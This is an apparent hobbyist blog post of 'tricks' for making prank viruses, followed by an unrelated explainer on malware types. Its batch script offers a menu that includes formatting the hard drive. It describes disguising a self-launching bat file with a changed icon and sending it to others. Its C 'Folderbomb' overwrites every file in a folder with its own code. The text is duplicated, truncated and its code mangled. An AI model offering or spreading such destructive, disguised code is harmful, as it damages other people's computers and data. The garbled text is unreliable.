Trick to make Poison Virus
There isTrick to make a Poison Virusi.e Virus which would definetly lead to destruction in computer.
This trick can be used to annoy Friends or Enemy.
This Virus would ask to choose a number
between 1 - 5 and then do a certain action :
1) Shutdown
2) Restart
3) Wipes out your hard drive (BEWARE).
4) Net send
5) Messages then shutdown
To make this simple virus follow these simple steps :
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :
@echo off
title The end of the world
cd C:\
:menu
cls
echo
I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
3) Save it as PoisonVirus.bat.
4) Now it is done.
So it is a simple Trick to make Poison Virus.
Worms are Programs that Replicate themselves from System to System without the use of a Host File. Worms generally Exist inside the other Files like Word or Excel Documents. This Trick can be used to annoy Friends or Enemy.
Note : Run this file at your own Risk. I am not Responsible for any Accident caused by this File on your Computer.Here is Trick to make PowerFull Worm Virus.
1) Open Notepad and type "Start Virus Virus.bat".
2) Save it as and Virus.bat.
3) Now create shortcut to this File so it looks more Serious.
4) Now go to Properties and Change Icon.
5) Now Rename it and Send it to anyone.
6) Now it is done.
So it is simple Trick to make PowerFull Worm Virus.
This trick can be used to annoy Friends or Enemy.
This Virus would ask to choose a number
between 1 - 5 and then do a certain action :
1) Shutdown
2) Restart
3) Wipes out your hard drive (BEWARE).
4) Net send
5) Messages then shutdown
To make this simple virus follow these simple steps :
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :
@echo off
title The end of the world
cd C:\
:menu
cls
echo
I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
3) Save it as PoisonVirus.bat.
4) Now it is done.
So it is a simple Trick to make Poison Virus.
Trick to make PowerFull Worm Virus.

Note : Run this file at your own Risk. I am not Responsible for any Accident caused by this File on your Computer.Here is Trick to make PowerFull Worm Virus.
1) Open Notepad and type "Start Virus Virus.bat".
2) Save it as and Virus.bat.
3) Now create shortcut to this File so it looks more Serious.
4) Now go to Properties and Change Icon.
5) Now Rename it and Send it to anyone.
6) Now it is done.
So it is simple Trick to make PowerFull Worm Virus.
VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
It will create Folder in a Folder in a Folder and so on ......
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt); else break; } close(source); close(target); done = findnext(&ffblk); } getch(); } Whats the difference between a virus, spyware, Malware, and adware? |
Now days the average computer user must be aware of the potential threats their computer faces each time they connect to the world wide web. It is a dangerous place for a computer and the security threats are growing everyday. Now we also have to protect our online accounts as well as files on our own computers. I know Avast Internet security now covers your social networking accounts. It is all so confusing, viruses, spyware, malware, and adware, just to name a few. Why are they all so different?
In the old days we used to call everything a virus, however now days we have more precise names to further categorize them. Below I will show you the difference between a virus, spyware, malware, and adware. It is important to protect your computer from viruses but how can you do that when you do not know what you are dealing with?
What is Malware?
Malware is a software program that has bad intentions. It can either be installed by the computer user accidentally or it can sneak into your computer through various avenues. Its not the same as a piece of software that by chance causes harm to your computer, malware is software that has been developed with the intent of causing problems with your computer.
What is Spyware?
Spyware is a type of malware program that invades your computer and basically spies on you. There are different types of spyware that collect different information. A common spyware type is a keylogger which records keystrokes typed on your keyboard. This is how people lose their bank account details. Other spyware will record your actions and browsing habits on the internet. Any information collected by spyware is usually with the intent to sell.
What is Adware?
Adware is another form of malware and is exactly as the name suggests, software with advertising. Adware can be downloaded and sometimes included in free programs. For example Windows Live messenger and Yahoo messenger contain adware. Although some programs give the option not to install the extra adware, others seem to sneak it in without permission.
What is Virus?
A virus is a small program designed to infect your computer and cause errors, computer crashes, and even destroy your computer hardware. Unlike spyware, a virus can grow and replicate itself. It can also travel from one computer to another via an internet connection. Of course you can get viruses from discs with virus infested files stored on them, however the internet is the most common entry point. Some common symptoms of a virus are emails being sent to all contacts when you didn’t send them, being taken to webpage’s that you didn’t choose, or being told you have a virus and to download a program to fix it.
0 comments:
Post a Comment